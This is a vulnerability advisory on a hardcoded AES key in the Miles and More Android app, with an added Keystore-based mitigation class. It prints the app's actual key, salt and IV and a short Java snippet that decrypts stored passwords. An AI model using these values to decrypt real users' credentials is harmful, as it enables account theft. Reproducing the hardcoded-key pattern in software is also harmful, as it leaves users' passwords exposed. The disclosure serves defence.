SIK-2017-018


Title:

Hardcoded encryption key in Miles and More app

Report ID

SIK-2017-018

Summary:

  • Vendor: Miles and More GmbH
  • Product: Miles and More App
  • Affected Version: 1704301952
  • Severity: low-medium
  • Short summary: The password is stored AES-encrypted in the shared prefs folder. The encryption key is hardcoded in the source code, so the stored password can easily be decrypted.

Details:

We assume that an attacker has access to the app's shared prefs (for example on a rooted device or via a backup).
After login the user credentials, including the password, are stored in the shared prefs. The password is stored AES-encrypted with a key that is hardcoded in the source code. The hardcoded key is identical on every installation, so a single key extracted from the APK decrypts the stored password of every user.

Example

With the following code the password can be decrypted. The Encryption class comes from the third-party library the app depends on (the dependent repository linked in the original report):


import android.util.Log;
// Encryption is the class from the third-party library the app bundles (dependent repository).

String password = getUserInput();
// Key, salt and IV exactly as hardcoded in the app; identical on every installation
String key = "dsafkfjadflakjnfldsakjn";
String salt = "sdgjfslgjknsfkgjmnmnm";
byte[] iv = { -89, -19, 17, -83, 86, 106, -31, 30, -5, -111, 61, -75, -84, 95, 120, -53 };
Encryption encryption = Encryption.getDefault(key, salt, iv);
String encryptedPassword = "";
String decryptedPassword = "";
try {
  // Round trip: same parameters produce the value found in shared prefs, and decrypt it again
  encryptedPassword = encryption.encrypt(password);
  Log.d("Encrypted Password: ", encryptedPassword);
  decryptedPassword = encryption.decrypt(encryptedPassword);
  Log.d("Decrypted Password: ", decryptedPassword);
}
catch (Exception e) {
  // The original snippet swallowed this exception; log it so failures are visible
  Log.e("Encryption", "encrypt/decrypt failed", e);
}

Workaround

  • Clear the app's data after use
  • Do not root the device

Suggested Mitigation

  • Use individual keys per installation
  • Offer options for not storing credentials on the device
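The following class is an added example showing how the two mitigations above can be implemented on Android; it is not code from the report or from the Miles and More app. The AES key is generated inside the Android Keystore on first use, so it differs per installation and never appears in the APK or in the shared prefs; the clearPassword method backs an opt-out from storing credentials. The class name, key alias and preference names are assumptions, and the code requires API level 23 for KeyGenParameterSpec.

```java
import android.content.Context;
import android.content.SharedPreferences;
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import android.util.Base64;

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.KeyStore;

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

// Hypothetical replacement for hardcoded-key credential storage (example, not the app's code).
public final class InstallKeyedCredentialStore {
    private static final String KEYSTORE = "AndroidKeyStore";
    private static final String ALIAS = "credential-key";   // assumed key alias
    private static final String PREFS = "credentials";      // assumed prefs file name
    private static final String CT_KEY = "password_ct";     // assumed pref keys
    private static final String IV_KEY = "password_iv";
    private static final int TAG_BITS = 128;

    private final SharedPreferences prefs;

    public InstallKeyedCredentialStore(Context ctx) {
        this.prefs = ctx.getSharedPreferences(PREFS, Context.MODE_PRIVATE);
    }

    // Returns this installation's key, generating it in the Keystore on the first call.
    // The key material is not exportable, so a copy of shared prefs alone is useless.
    private static SecretKey getOrCreateKey() throws GeneralSecurityException, IOException {
        KeyStore ks = KeyStore.getInstance(KEYSTORE);
        ks.load(null);
        KeyStore.Entry entry = ks.getEntry(ALIAS, null);
        if (entry instanceof KeyStore.SecretKeyEntry) {
            return ((KeyStore.SecretKeyEntry) entry).getSecretKey();
        }
        KeyGenerator kg = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, KEYSTORE);
        kg.init(new KeyGenParameterSpec.Builder(ALIAS,
                KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
                .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
                .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
                .setKeySize(256)
                .build());
        return kg.generateKey();
    }

    // Encrypts with AES-GCM; the Keystore supplies a fresh random IV for every call,
    // unlike the fixed IV in the vulnerable snippet, so equal passwords do not repeat.
    public void storePassword(String password) throws GeneralSecurityException, IOException {
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, getOrCreateKey());
        byte[] ct = cipher.doFinal(password.getBytes(StandardCharsets.UTF_8));
        prefs.edit()
             .putString(CT_KEY, Base64.encodeToString(ct, Base64.NO_WRAP))
             .putString(IV_KEY, Base64.encodeToString(cipher.getIV(), Base64.NO_WRAP))
             .apply();
    }

    // Returns the stored password, or null if none is stored. doFinal throws
    // AEADBadTagException if the ciphertext in shared prefs was modified.
    public String loadPassword() throws GeneralSecurityException, IOException {
        String ct = prefs.getString(CT_KEY, null);
        String iv = prefs.getString(IV_KEY, null);
        if (ct == null || iv == null) {
            return null;
        }
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, getOrCreateKey(),
                    new GCMParameterSpec(TAG_BITS, Base64.decode(iv, Base64.NO_WRAP)));
        byte[] pt = cipher.doFinal(Base64.decode(ct, Base64.NO_WRAP));
        return new String(pt, StandardCharsets.UTF_8);
    }

    // Backs a "do not remember my password" option: nothing secret stays on the device.
    public void clearPassword() {
        prefs.edit().remove(CT_KEY).remove(IV_KEY).apply();
    }
}
```

Typical use is storePassword after a successful login when the user has opted in, loadPassword on the next start, and clearPassword when the user opts out or logs out. Because the key lives in the Keystore, copying the app's shared prefs to another device or installation yields only ciphertext, which is the property the hardcoded key lacked.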

Timeline

  • 2017-05-01 Vulnerability Discovered
  • 2017-05-18 Vulnerability Reported
  • 2017-07-26 Vulnerability Fixed